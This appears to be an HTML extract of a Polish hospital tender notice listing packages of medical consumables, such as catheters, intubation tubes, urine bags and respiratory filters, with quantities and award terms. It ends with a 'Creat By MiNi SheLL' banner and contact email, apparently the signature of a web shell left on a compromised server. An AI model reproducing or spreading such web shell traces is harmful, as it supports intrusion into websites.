<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewnik do pępowiny 5/40-50		szt.20    
	2	Cewnik podwójny do odsysania F18, 28, 36/50 cm		szt. 20    
	3	Dren Ulmera od nr 10 do 18		szt.2 200    
	4	Końcówka do odsysania mini yankauer - różne rozmiary		szt.200    
	5	Końcówka do odsysania OP FLEX SUPERFLOW lub równoważne - różne rozmiary		szt.200    
	6	Końcówka do odsysania pola operacyjnego o parametrach OP.-FLEX/POOL X-RAY lub równoważne - różne rozmiary		szt.30    
	7	Końcówka do odsysania typu YANKAUER z koszyczkiem i bez koszyczka różne rozmiary		szt.500    
	8	Łącznik do drenów prosty - różne rozmiary		szt.600    
	9	Łącznik do drenów schodkowy - różne rozmiary		szt.350    
	10	Łącznik do drenów typ Y 9-9-9 mm		szt.350    
	11	Łącznik tlenowy DISS		szt.30    
	12	Maski do wysokiej koncentracji tlenu dla dorosłych		 szt 650    
	13	Worek do moczu z krótkim drenem 35 cm		szt.200    
	14	Worek do żółci		szt.	1	 50    
	15	Worek mikcyjny męski 1litr		szt.200    
	16	Worek wymienny Uno-Vac		szt.500    
	17	Zestaw do drenażu ran UNO-VAC		szt.700    
	18	Zestaw do drenażu ran z drenem 400 ml - typu Unoversal (szpila) od 12 do 18	szt.350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Łącznik karbowany 15-16cm		szt.150    
	2	Rurka Guadel od nr 00 do nr  5		szt.3 500    
	3	Rurka intubacyjna nosowa od 5 do 9 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki		szt.100    
	4	Rurka intubacyjna bez mankietu od nr 2 do 4,5, pakowane w opakowanie jednostkowe posiadajace punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki, końcówka rurki posiadająca pasek w kolorze czarnym umieszczony wzdłuż końcówki rurki (nie półpierścień)		szt.100    
	5	Rurka intubacyjna z mankietem od nr2,5 do 4,5 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki		szt.200    
	6	Rurka intubacyjna z mankietem od nr 5 do 9 pakowana w opakowanie jednostkowe posiadające punktowe zgrzewy zapewniające utrzymanie anatomicznego kształtu rurki		szt.4 200    
	7	Rurka tracheostomijna od nr 6 do 10, posiadająca dwie wstążki mocujące i nieprzezroczyste skrzydełka mocujące 		szt.150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Gąbka do mycia jamy ustnej, nienasączona		szt.8 000    
	2	Ostrze chirurgiczne sterylne jednorazowe od 10A do 24 numer i nazwa producenta wygrawerowane na ostrzu. Nr serii i data ważności na opakowaniu jednostkowym. Kształt ostrza na opakowaniu jednostkowym.		op.350    
	3	Pałeczki do wymazów sterylne		op.800    
	4	Pinceta jednorazowa sterylna		szt.5 000    
	5	Szczoteczki do chirurgicznego mycia rąk, suche, sterylne	szt.2 000    
	6	Szpatułki Laryngologiczne, sterylne		op.50    
	7	Woreczek do moczu dla dziewczynek i chłopców		szt.1 200    
	8	Worek do moczu sterylny jednodniowy 		szt.17 000    
	9	Wziernik ginekologiczny od rozm. XS do L 		szt.6 500    
	10	Zaciskacz pępowiny mikrobiologicznie czysty		szt.500    
	11	Zatyczka do cewników		szt.1 000    
	12	Zestaw do godzinowej zbiórki moczu		szt.20    
	13	Zestaw do lewatyw		szt.850    
	14	Zestaw do pobierania wydzieliny z dróg oddech.		szt.250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filtr bez nawilżacza typu Iso-Gard		szt.7 000    
	2	Filtr oddechowy z wymiennikiem ciepła i wilgoci dla dzieci	szt.100    
	3	Filtr antybakteryjny z nawilżaczem		szt.2 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com